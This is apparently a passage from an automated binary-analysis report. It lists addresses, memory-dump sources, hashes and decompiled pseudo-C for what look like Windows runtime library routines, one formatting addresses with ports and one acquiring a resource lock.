                                                                                                                                                        0x0090055a
                                                                                                                                                        0x0090055d
                                                                                                                                                        0x00900563
                                                                                                                                                        0x00900566
                                                                                                                                                        0x009005d8
                                                                                                                                                        0x009005e2
                                                                                                                                                        0x009005e5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009005e7
                                                                                                                                                        0x009005e7
                                                                                                                                                        0x009005ea
                                                                                                                                                        0x009005f3
                                                                                                                                                        0x009005f3
                                                                                                                                                        0x00900568
                                                                                                                                                        0x00900568
                                                                                                                                                        0x00900568
                                                                                                                                                        0x00900569
                                                                                                                                                        0x00900569
                                                                                                                                                        0x00900569
                                                                                                                                                        0x0090056b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092217f
                                                                                                                                                        0x00922183
                                                                                                                                                        0x0092225b
                                                                                                                                                        0x0092225f
                                                                                                                                                        0x00922189
                                                                                                                                                        0x0092218c
                                                                                                                                                        0x0092218f
                                                                                                                                                        0x00922194
                                                                                                                                                        0x00922199
                                                                                                                                                        0x0092219d
                                                                                                                                                        0x009221a0
                                                                                                                                                        0x009221a2
                                                                                                                                                        0x009221ce
                                                                                                                                                        0x009221ce
                                                                                                                                                        0x009221ce
                                                                                                                                                        0x009221d0
                                                                                                                                                        0x009221d6
                                                                                                                                                        0x009221de
                                                                                                                                                        0x009221e2
                                                                                                                                                        0x009221e8
                                                                                                                                                        0x009221e9
                                                                                                                                                        0x009221ec
                                                                                                                                                        0x009221f1
                                                                                                                                                        0x009221f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221f8
                                                                                                                                                        0x009221fb
                                                                                                                                                        0x00922206
                                                                                                                                                        0x0092220b
                                                                                                                                                        0x0092220c
                                                                                                                                                        0x00922217
                                                                                                                                                        0x00922226
                                                                                                                                                        0x0092222b
                                                                                                                                                        0x0092222c
                                                                                                                                                        0x0092222f
                                                                                                                                                        0x00922232
                                                                                                                                                        0x00922235
                                                                                                                                                        0x00922235
                                                                                                                                                        0x0092223a
                                                                                                                                                        0x0092223f
                                                                                                                                                        0x00922241
                                                                                                                                                        0x00922243
                                                                                                                                                        0x00922248
                                                                                                                                                        0x00922248
                                                                                                                                                        0x0092224d
                                                                                                                                                        0x0092224f
                                                                                                                                                        0x00922262
                                                                                                                                                        0x00922263
                                                                                                                                                        0x00922268
                                                                                                                                                        0x00922269
                                                                                                                                                        0x00922269
                                                                                                                                                        0x00922269
                                                                                                                                                        0x0092226d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922276
                                                                                                                                                        0x00922279
                                                                                                                                                        0x0092227e
                                                                                                                                                        0x00922283
                                                                                                                                                        0x00922287
                                                                                                                                                        0x0092228a
                                                                                                                                                        0x0092228d
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222be
                                                                                                                                                        0x009222c4
                                                                                                                                                        0x009222cc
                                                                                                                                                        0x009222d0
                                                                                                                                                        0x009222d6
                                                                                                                                                        0x009222d7
                                                                                                                                                        0x009222da
                                                                                                                                                        0x009222df
                                                                                                                                                        0x009222e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222e6
                                                                                                                                                        0x009222e9
                                                                                                                                                        0x009222f4
                                                                                                                                                        0x009222f9
                                                                                                                                                        0x009222fa
                                                                                                                                                        0x00922305
                                                                                                                                                        0x00922314
                                                                                                                                                        0x00922319
                                                                                                                                                        0x0092231a
                                                                                                                                                        0x0092231d
                                                                                                                                                        0x00922320
                                                                                                                                                        0x00922323
                                                                                                                                                        0x00922323
                                                                                                                                                        0x00922328
                                                                                                                                                        0x0092232d
                                                                                                                                                        0x0092232f
                                                                                                                                                        0x00922331
                                                                                                                                                        0x00922336
                                                                                                                                                        0x00922336
                                                                                                                                                        0x0092233b
                                                                                                                                                        0x0092233d
                                                                                                                                                        0x00922350
                                                                                                                                                        0x00922351
                                                                                                                                                        0x00922356
                                                                                                                                                        0x00922359
                                                                                                                                                        0x00922359
                                                                                                                                                        0x0092235b
                                                                                                                                                        0x0092235d
                                                                                                                                                        0x008e5367
                                                                                                                                                        0x008e536b
                                                                                                                                                        0x008e5372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922363
                                                                                                                                                        0x00922363
                                                                                                                                                        0x00922369
                                                                                                                                                        0x0092236a
                                                                                                                                                        0x0092236c
                                                                                                                                                        0x00922371
                                                                                                                                                        0x00922373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922379
                                                                                                                                                        0x00922379
                                                                                                                                                        0x0092237a
                                                                                                                                                        0x0092237f
                                                                                                                                                        0x0092237f
                                                                                                                                                        0x00922385
                                                                                                                                                        0x00922386
                                                                                                                                                        0x00922389
                                                                                                                                                        0x0092238e
                                                                                                                                                        0x00922390
                                                                                                                                                        0x008e5378
                                                                                                                                                        0x008e537c
                                                                                                                                                        0x00922396
                                                                                                                                                        0x00922396
                                                                                                                                                        0x00922397
                                                                                                                                                        0x0092239c
                                                                                                                                                        0x009223a2
                                                                                                                                                        0x009223a3
                                                                                                                                                        0x009223a6
                                                                                                                                                        0x009223ab
                                                                                                                                                        0x009223ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009223b3
                                                                                                                                                        0x009223b3
                                                                                                                                                        0x009223b4
                                                                                                                                                        0x009223b9
                                                                                                                                                        0x009223ba
                                                                                                                                                        0x009223ba
                                                                                                                                                        0x009223bc
                                                                                                                                                        0x009223bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919153
                                                                                                                                                        0x00919158
                                                                                                                                                        0x0091915a
                                                                                                                                                        0x0091915e
                                                                                                                                                        0x00919160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919166
                                                                                                                                                        0x00919166
                                                                                                                                                        0x00919171
                                                                                                                                                        0x00919176
                                                                                                                                                        0x00919176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919160
                                                                                                                                                        0x009223c6
                                                                                                                                                        0x009223ce
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223ad
                                                                                                                                                        0x00922390
                                                                                                                                                        0x00922373
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922293
                                                                                                                                                        0x00922295
                                                                                                                                                        0x0092229a
                                                                                                                                                        0x009222a1
                                                                                                                                                        0x009222a3
                                                                                                                                                        0x009222a7
                                                                                                                                                        0x009222a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222ab
                                                                                                                                                        0x009222ad
                                                                                                                                                        0x009222af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222af
                                                                                                                                                        0x009222b1
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53cb
                                                                                                                                                        0x008e53ce
                                                                                                                                                        0x008e53d0
                                                                                                                                                        0x008e53d4
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d8
                                                                                                                                                        0x008e53e3
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x00922349
                                                                                                                                                        0x0092234d
                                                                                                                                                        0x00922251
                                                                                                                                                        0x00922251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922251
                                                                                                                                                        0x009221a4
                                                                                                                                                        0x009221a4
                                                                                                                                                        0x009221a6
                                                                                                                                                        0x009221a8
                                                                                                                                                        0x009221ac
                                                                                                                                                        0x009221b6
                                                                                                                                                        0x009221b8
                                                                                                                                                        0x009221bc
                                                                                                                                                        0x009221be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c0
                                                                                                                                                        0x009221c2
                                                                                                                                                        0x009221c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c4
                                                                                                                                                        0x009221c6
                                                                                                                                                        0x009221c6
                                                                                                                                                        0x009221c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009221c8
                                                                                                                                                        0x009221a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922183
                                                                                                                                                        0x0090057b
                                                                                                                                                        0x0090057d
                                                                                                                                                        0x00900581
                                                                                                                                                        0x00900583
                                                                                                                                                        0x00922178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00900589
                                                                                                                                                        0x0090058f
                                                                                                                                                        0x0090058f
                                                                                                                                                        0x00900583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00922206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                                                                                                                                                        • Instruction ID: 2029c48b347973a1e417023e4c4ed5587bf3c9de51bb9eb2707bfd12ae49ea21
                                                                                                                                                        • Opcode Fuzzy Hash: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                                                                                                                                                        • Instruction Fuzzy Hash: E25128357042216FEB14CB19DC81FA633ADEBD4720F218229FD55DB38ADA75EC828790
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 009014C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E009014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9a2088; // 0x7779c78d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E008F7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009013CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E008F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008C2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                        0x009014c0
                                                                                                                                                        0x009014cb
                                                                                                                                                        0x009014d2
                                                                                                                                                        0x009014d6
                                                                                                                                                        0x009014da
                                                                                                                                                        0x009014de
                                                                                                                                                        0x009014e3
                                                                                                                                                        0x0090157a
                                                                                                                                                        0x0090157a
                                                                                                                                                        0x009014f1
                                                                                                                                                        0x009014f3
                                                                                                                                                        0x0092ea0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ea15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ea15
                                                                                                                                                        0x009014f9
                                                                                                                                                        0x009014f9
                                                                                                                                                        0x009014fe
                                                                                                                                                        0x00901504
                                                                                                                                                        0x0092ea1a
                                                                                                                                                        0x0092ea1f
                                                                                                                                                        0x0092ea21
                                                                                                                                                        0x0092ea22
                                                                                                                                                        0x0092ea27
                                                                                                                                                        0x0092ea2a
                                                                                                                                                        0x0092ea2a
                                                                                                                                                        0x00901515
                                                                                                                                                        0x00901517
                                                                                                                                                        0x0090156d
                                                                                                                                                        0x00901572
                                                                                                                                                        0x00901575
                                                                                                                                                        0x00901575
                                                                                                                                                        0x0090151e
                                                                                                                                                        0x0092ea50
                                                                                                                                                        0x0092ea55
                                                                                                                                                        0x0092ea58
                                                                                                                                                        0x0092ea58
                                                                                                                                                        0x0090152e
                                                                                                                                                        0x00901531
                                                                                                                                                        0x00901533
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00901535
                                                                                                                                                        0x00901541
                                                                                                                                                        0x00901549
                                                                                                                                                        0x00901549
                                                                                                                                                        0x00901533
                                                                                                                                                        0x009014f3
                                                                                                                                                        0x00901559

                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0092EA22
                                                                                                                                                          • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 0090146B
                                                                                                                                                          • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 00901490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0090156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                                                                                                                                                        • Instruction ID: d60bb4c4d903ac62cfddf306c8561288ee324dec9172430db109ee52469ae110
                                                                                                                                                        • Opcode Fuzzy Hash: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                                                                                                                                                        • Instruction Fuzzy Hash: 8D21BF729002299FCB21EE68DC45AEE73BCFB54700F444456F946E7280DB74EA988BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00963DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                        			E00963DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v11;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t19;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;
				signed int _t44;
				void* _t45;

				_t39 = __edx;
				_t17 =  *0x9a2088; // 0x7779c78d
				_v8 = _t17 ^ _t44;
				_t34 = _a16;
				_t41 = _a4;
				_t40 = _a20;
				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
					L12:
					_t19 = 0xc000000d;
				} else {
					_t21 =  &_v76;
					if(_a12 != 0) {
						_push(0x8c9cbe);
						_push(0x41);
						_push( &_v76);
						_t33 = E0097894A();
						_t45 = _t45 + 0xc;
						_t21 = _t44 + _t33 - 0x48;
					}
					_t42 = E00963B8E(_t41, _t21);
					if(_a8 != 0) {
						_t32 = E0097894A(_t42,  &_v11 - _t42, "%%%u", _a8);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t32;
					}
					if(_a12 != 0) {
						_t29 = E0097894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t29;
					}
					_t41 = _t42 -  &_v76 + 1;
					 *_t40 = _t41;
					if( *_t40 < _t41) {
						goto L12;
					} else {
						E008C2340(_t34,  &_v76, _t41);
						_t19 = 0;
					}
				}
				return E008CE1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
			}




















                                                                                                                                                        0x00963da7
                                                                                                                                                        0x00963daf
                                                                                                                                                        0x00963db6
                                                                                                                                                        0x00963dba
                                                                                                                                                        0x00963dbe
                                                                                                                                                        0x00963dc2
                                                                                                                                                        0x00963dc7
                                                                                                                                                        0x00963e6b
                                                                                                                                                        0x00963e6b
                                                                                                                                                        0x00963de1
                                                                                                                                                        0x00963de6
                                                                                                                                                        0x00963de9
                                                                                                                                                        0x00963deb
                                                                                                                                                        0x00963df0
                                                                                                                                                        0x00963df2
                                                                                                                                                        0x00963df3
                                                                                                                                                        0x00963df8
                                                                                                                                                        0x00963dfb
                                                                                                                                                        0x00963dfb
                                                                                                                                                        0x00963e0a
                                                                                                                                                        0x00963e0c
                                                                                                                                                        0x00963e1d
                                                                                                                                                        0x00963e22
                                                                                                                                                        0x00963e25
                                                                                                                                                        0x00963e25
                                                                                                                                                        0x00963e2c
                                                                                                                                                        0x00963e46
                                                                                                                                                        0x00963e4b
                                                                                                                                                        0x00963e4e
                                                                                                                                                        0x00963e4e
                                                                                                                                                        0x00963e55
                                                                                                                                                        0x00963e58
                                                                                                                                                        0x00963e5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963e5c
                                                                                                                                                        0x00963e5f
                                                                                                                                                        0x00963e67
                                                                                                                                                        0x00963e67
                                                                                                                                                        0x00963e5a
                                                                                                                                                        0x00963e7e

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                                                                                                                                                        • Instruction ID: 059a7f9520018a1c3c6fa65fc03c2c7a1cdb6c1a5d284e58829349d738681e79
                                                                                                                                                        • Opcode Fuzzy Hash: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                                                                                                                                                        • Instruction Fuzzy Hash: 0921AFB290021AABCB21AF698C45AEF77ACEF54714F048525FC08D3241EB759F44C7E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E008E53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009a01c0;
									_push(_t92);
									_push(0);
									_t37 = E008BF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00904FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00913F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00913F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0094217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00913F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00903915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E008E5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008BF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00903915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008BF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00903915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008BF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00903915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E008E5329(_t74, _t92);
													_push(1);
													_t48 = E008E53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                        0x008e53ab
                                                                                                                                                        0x008e53ae
                                                                                                                                                        0x008e53b1
                                                                                                                                                        0x008e53b4
                                                                                                                                                        0x008e53b7
                                                                                                                                                        0x009005b6
                                                                                                                                                        0x009005c0
                                                                                                                                                        0x009005c3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009005c9
                                                                                                                                                        0x009005c9
                                                                                                                                                        0x009005cc
                                                                                                                                                        0x009005d5
                                                                                                                                                        0x009005d5
                                                                                                                                                        0x008e53bd
                                                                                                                                                        0x008e53bd
                                                                                                                                                        0x008e53bd
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53be
                                                                                                                                                        0x008e53c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922269
                                                                                                                                                        0x0092226d
                                                                                                                                                        0x00922349
                                                                                                                                                        0x0092234d
                                                                                                                                                        0x00922273
                                                                                                                                                        0x00922276
                                                                                                                                                        0x00922279
                                                                                                                                                        0x0092227e
                                                                                                                                                        0x00922283
                                                                                                                                                        0x00922287
                                                                                                                                                        0x0092228a
                                                                                                                                                        0x0092228d
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222bc
                                                                                                                                                        0x009222be
                                                                                                                                                        0x009222c4
                                                                                                                                                        0x009222cc
                                                                                                                                                        0x009222d0
                                                                                                                                                        0x009222d6
                                                                                                                                                        0x009222d7
                                                                                                                                                        0x009222da
                                                                                                                                                        0x009222df
                                                                                                                                                        0x009222e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222e6
                                                                                                                                                        0x009222e9
                                                                                                                                                        0x009222f4
